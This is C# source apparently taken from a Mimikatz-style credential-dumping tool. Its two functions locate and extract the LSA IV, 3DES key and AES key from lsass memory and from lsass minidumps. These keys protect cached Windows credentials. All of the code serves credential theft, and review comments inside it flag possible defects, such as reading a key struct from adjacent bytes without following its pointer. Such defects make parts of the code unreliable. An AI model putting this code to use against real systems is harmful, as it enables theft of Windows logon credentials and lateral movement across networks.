/// <summary>
/// Follows the DES key-pointer chain described by <paramref name="template"/> through a
/// minidump and returns the first 24 bytes of the parsed <c>KIWI_BCRYPT_KEY81.hardkey.data</c>.
/// The reader position of <c>minidump.fileBinaryReader</c> is moved as a side effect.
/// </summary>
/// <param name="minidump">Parsed dump; its <c>fileBinaryReader</c> is seeked and read in place.</param>
/// <param name="pos">Base position to which <c>template.key_pattern.offset_to_DES_key_ptr</c> is added.</param>
/// <param name="template">OS-specific layout supplying the offset of the DES key pointer.</param>
/// <returns>A new 24-byte array (3DES key length) taken from the start of <c>hardkey.data</c>.</returns>
public static byte[] get_des_key(Program.MiniDump minidump, long pos, lsaTemplate_NT6.LsaTemplate_NT6 template)
{
    // Position of the pointer to the key handle, relative to pos.
    long offset = (pos + template.key_pattern.offset_to_DES_key_ptr);
    // NOTE: despite its name, ptr_iv carries the DES key-handle pointer chain here, not an IV.
    long ptr_iv = (long)Helpers.get_ptr_with_offset(minidump.fileBinaryReader, (long)offset, minidump.sysinfo);
    minidump.fileBinaryReader.BaseStream.Seek(ptr_iv, 0); // 0 == SeekOrigin.Begin
    // Dereference once more: the 8-byte value at that position is a virtual address that
    // Rva2offset translates into a file offset inside the dump.
    ptr_iv = (long)Minidump.Helpers.ReadUInt64(minidump.fileBinaryReader);
    ptr_iv = Helpers.Rva2offset(minidump, ptr_iv);
    minidump.fileBinaryReader.BaseStream.Seek(ptr_iv, 0);
    // Parse the key handle struct; h3DesKey itself is not used after this point.
    byte[] h3DesKeyBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY)));
    KIWI_BCRYPT_HANDLE_KEY h3DesKey = Helpers.ReadStruct<KIWI_BCRYPT_HANDLE_KEY>(h3DesKeyBytes);
    // NOTE(review): the KIWI_BCRYPT_KEY81 is read from the bytes immediately following the
    // handle struct in the reader, not by following h3DesKey.key as FindKeys does — confirm
    // the dump layout guarantees this adjacency; if it does not, the result is silently wrong
    // rather than an error. ReadBytes may also return fewer bytes than requested at end of
    // stream, and nothing here checks the length before ReadStruct.
    byte[] extracted3DesKeyByte = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81)));
    KIWI_BCRYPT_KEY81 extracted3DesKey = Helpers.ReadStruct<KIWI_BCRYPT_KEY81>(extracted3DesKeyByte);
    // Only the first 24 bytes of hardkey.data are returned (FindKeys keeps the whole field).
    return(extracted3DesKey.hardkey.data.Take(24).ToArray());
}
/// <summary>
/// Locates the LSA key material (IV, 3DES key, AES key) inside the lsasrv.dll image mapped at
/// <paramref name="lsasrvMem"/> in the process referred to by <paramref name="hLsass"/> and stores
/// it in <c>this.iv</c>, <c>this.deskey</c> and <c>this.aeskey</c>.
/// </summary>
/// <param name="hLsass">Process handle, passed by reference to every <c>Utility.ReadFromLsass</c> call.</param>
/// <param name="lsasrvMem">Base address of lsasrv.dll in the target process; all offsets below are relative to it.</param>
/// <param name="oshelper">Per-OS signature (<c>keyIVSig</c>) and the three instruction-relative offsets (<c>IV_OFFSET</c>, <c>DES_OFFSET</c>, <c>AES_OFFSET</c>).</param>
/// <returns>0 on success; 1 if the signature was not found in the first <c>max_search_size</c> bytes.</returns>
private int FindKeys(IntPtr hLsass, IntPtr lsasrvMem, OSVersionHelper oshelper)
{
    long keySigOffset = 0;
    long ivOffset = 0;
    long desOffset = 0, aesOffset = 0;
    KIWI_BCRYPT_HANDLE_KEY h3DesKey = new KIWI_BCRYPT_HANDLE_KEY();
    KIWI_BCRYPT_HANDLE_KEY hAesKey = new KIWI_BCRYPT_HANDLE_KEY();
    KIWI_BCRYPT_KEY81 extracted3DesKey, extractedAesKey;
    IntPtr keyPointer = IntPtr.Zero; // assigned but never read below

    // Search for AES/3Des/IV signature within lsasrv.dll and grab the offset.
    // A return of 0 is treated as "not found"; this is the only failure path that is
    // reported explicitly. Short reads from ReadFromLsass are not checked anywhere below
    // and would surface as exceptions from BitConverter/ReadStruct instead.
    keySigOffset = (long)Utility.OffsetFromSign("lsasrv.dll", oshelper.keyIVSig, max_search_size);
    if (keySigOffset == 0)
    {
        Console.WriteLine("[x] Error: Could not find offset to AES/3Des/IV keys\n");
        return(1);
    }

    // Each of the three sections below resolves an x64 RIP-relative operand: read the 4-byte
    // displacement at sig + OFFSET, then add it to the address of the *end* of that field
    // (hence the "+ 4"). The (int) casts assume all offsets fit in 32 bits, which holds for
    // offsets inside a single DLL image.

    // Retrieve offset to InitializationVector address due to "lea reg, [InitializationVector]" instruction
    IntPtr tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.IV_OFFSET);
    byte[] ivOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4);
    ivOffset = BitConverter.ToInt32(ivOffsetBytes, 0); // displacement is signed
    tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.IV_OFFSET + 4 + (int)ivOffset);
    // Read InitializationVector (16 bytes)
    this.iv = Utility.ReadFromLsass(ref hLsass, tmp_p, 16);

    tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.DES_OFFSET);
    // Retrieve offset to h3DesKey address due to "lea reg, [h3DesKey]" instruction
    byte[] desOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4);
    desOffset = BitConverter.ToInt32(desOffsetBytes, 0);
    tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.DES_OFFSET + 4 + (int)desOffset);
    // Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
    byte[] keyPointerBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 8);
    long keyPointerInt = BitConverter.ToInt64(keyPointerBytes, 0);
    // Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
    byte[] h3DesKeyBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(keyPointerInt), Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY))));
    h3DesKey = Utility.ReadStruct<KIWI_BCRYPT_HANDLE_KEY>(h3DesKeyBytes);
    // Read in the 3DES key by following the handle's key pointer; the whole hardkey.data
    // field is kept (get_des_key, by contrast, truncates it to 24 bytes).
    byte[] extracted3DesKeyByte = Utility.ReadFromLsass(ref hLsass, h3DesKey.key, Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81))));
    extracted3DesKey = Utility.ReadStruct<KIWI_BCRYPT_KEY81>(extracted3DesKeyByte);
    this.deskey = extracted3DesKey.hardkey.data;

    tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.AES_OFFSET);
    // Retrieve offset to hAesKey address due to "lea reg, [hAesKey]" instruction
    byte[] aesOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4);
    // NOTE(review): read as unsigned here but signed for the IV/DES displacements above; a
    // negative displacement appears to work only because the (int) cast on the next line
    // wraps in an unchecked context. ToInt32 would make the three sections consistent.
    aesOffset = BitConverter.ToUInt32(aesOffsetBytes, 0);
    tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.AES_OFFSET + 4 + (int)aesOffset);
    // Retrieve pointer to hAesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
    keyPointerBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 8);
    keyPointerInt = BitConverter.ToInt64(keyPointerBytes, 0);
    // Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
    byte[] hAesKeyBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(keyPointerInt), Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY))));
    hAesKey = Utility.ReadStruct<KIWI_BCRYPT_HANDLE_KEY>(hAesKeyBytes);
    // Read in AES key
    byte[] extractedAesKeyBytes = Utility.ReadFromLsass(ref hLsass, hAesKey.key, Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81))));
    extractedAesKey = Utility.ReadStruct<KIWI_BCRYPT_KEY81>(extractedAesKeyBytes);
    this.aeskey = extractedAesKey.hardkey.data;
    return(0);
}